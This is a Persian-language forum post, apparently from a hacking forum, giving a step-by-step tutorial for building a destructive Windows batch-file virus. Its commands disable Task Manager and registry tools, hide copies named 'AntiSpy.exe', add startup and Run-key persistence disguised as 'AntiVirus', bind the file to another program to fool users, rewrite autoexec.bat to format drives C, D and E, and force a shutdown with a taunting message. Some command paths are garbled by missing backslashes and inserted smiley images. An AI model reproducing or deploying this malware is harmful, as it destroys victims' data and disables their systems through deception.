ninjahacker

آموزش ساخت یک ویروس توپ فقط با ویندوز

خوب در اول ما باید یک فایل متنی ایجاد کنیم که از برنامه نت پد می شود استفاده کرد . سپس
بعد نوشتن فرمان های مورد نظر فایل مذکور را با پسوند bat ذخیره می کنیم . در ادامه کار
بوسیله برنامه Quick Batch File Compiler فایل مورد نظر را تبدیل به فایل اجرایی با پسوند exe
می کنیم و یک آیسلامد هم برای فایل مشخص می کنیم تا ظاهری گول زننده داشته باشد.
در نهایت هم این فایل می توانیم بوسیله برنامه EBundle به یک برنامه پیوست کنیم که در زمان
اجرای برنامه مورد نظر کاربر فایل ما هم اجرا شده .

فرمان ها :

1- با استفاده از دو فرمان زیر دو سرویس TaskManager و Registry بصورت غیر قابل استفاده برای کاربر خواهد شد.

غیر فعال کردن TaskManager


reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f

غیر فعال کردن Registry


reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f

البته با تغییر مقدار از 1 به 0 کاربر می تواند از این دو سرویس استفاده کند.بعنوان مثال سیستم
شما آلوده به ویروس شده و شما نمی توانید از این دو سرویس استفاده نمایید فقط کافی است
یک فایل اجرا ساخته و این دو فرمان را در داخل آن قرار داده البته مقدار هر دو را برابر 0 قرار دهید
بعد از اجرای فایل شما می توانید از این دو سرویس استفاده کنید.

2- در این قسمت تمام فایل های اجرای با پسوند exe از دایرکتوری جاری به درایو مورد نظر
کپی می شود و در ادامه خصلیت فایل مورد نظر بصورت مخفی و فقط خواندنی تعریف می شود


copy *.exe e:
copy *.exe d:
d:
attrib +r +h AntiSpy.exe
e:
attrib +r +h AntiSpy.exe

3- در این قسمت هم آدرس فایل مورد نظر در رجیستری در قسمت Run تعریف می شود که در هر بار اجرا شدن ویندوز فایل مورد نظر اجرا شود . البته در اینجا من فقط آدرس فایل را از پارتیشن C
تعریف کردم شما می توانید این کار را برای دیگر پارتیشن ها هم انجام دهید.


reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRun /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunServices /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionRunServicesOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionRun /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionRunOnce /v AntiVirus /t REG_SZ /d C:AntiSpy.exe /f

4- در این مرحله باز فایل اجرای مورد نظر را از دایرکتوری جاری به داخل دایرکتوری startup ویندوز
کپی می شود که باز با اجرا شدن ویندوز فایل مورد نظر ما اجرا شود.در اینجا فقط یه نکته لازم
به ذکر است که باسد توجه نمایید به نحوه آدرس دادن به مسیر کپی شدن فایل.
همونطور که میدانید در محیط داس نمی توان برای اسم یک فایل یا دایرکتوری بیش از 8 کارکتر
در نظر گرفت . در صورتیکه اسم یک فایل یا دایرکتوری بیش از 8 کارکتر باشد در محیط داس
شما نمی توانید اسم فایل یا دایرکتوری را بصورت کامل ببینید. اما اگر از فرمان cmd استفاده
نماید برای دسترسی به محیط داس شما اسم فایل و دایرکتوری را بصورت کامل می بینید
حتی اگر بیش از 8 کارکتر باشد. برای اینکه شما آدرس درست یک دایرکتوری را بدست آورید
نیاز دارید که از فرمان command استفاده نمایید.


copy *.exe c:docume~1alluse~1startm~1programsstartup
copy *.exe d:docume~1alluse~1startm~1programsstartup
copy *.exe e:docume~1alluse~1startm~1programsstartup

5- در این قسمت با تغییر در فایل autoexec.bat و با استفاده از فرمان فرمت بعد از ریستارت سیستم و با اجرا شدن این فایل پارتیشن هایی که مشخص شده اند فرمت شده و اطلاعات کاربر
پاک می شود. البته این به شرطی است که نوع فرمت پارتیشن ها بصورت FAT یا FAT32 باشد
در صورتیکه NTFS باشد فکر کنم این فایل اجرا نشود.


@echo off
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo format/v:1 /q /y d[IMG]http://*******************com/images/smilies/icon_tw isted.gif[/IMG] nul >>c:autoexec.bat
echo format/v:1 /q /y e[IMG]http://*******************com/images/smilies/icon_tw isted.gif[/IMG] nul >>c:autoexec.bat
echo format/v:1 /q /y c[IMG]http://*******************com/images/smilies/icon_tw isted.gif[/IMG] nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
6- در نهایت هم با استفاده از این فرمان بعد از مدت زمان تعیین شده سیستم ریستارت می شود
و پیغام مورد نظر شما در طول این مدت برای کاربر نشان داده می شود.

shutdown -s -t 30 -c "Ha Ha Ha"

هر چه زمان تعریف شده کمتر باشد سیستم زودتر ریستارت شده و اجازه هر کاری از کاربر سلب
سلب می شود . اگر بصورت اشتباه این فرمان را روی سیستم خود اجرا کردید با استفاده از فرمان
shutdown -a
از عمل ریستارت شدن سیستم خود می توانید جلوگیری کنید.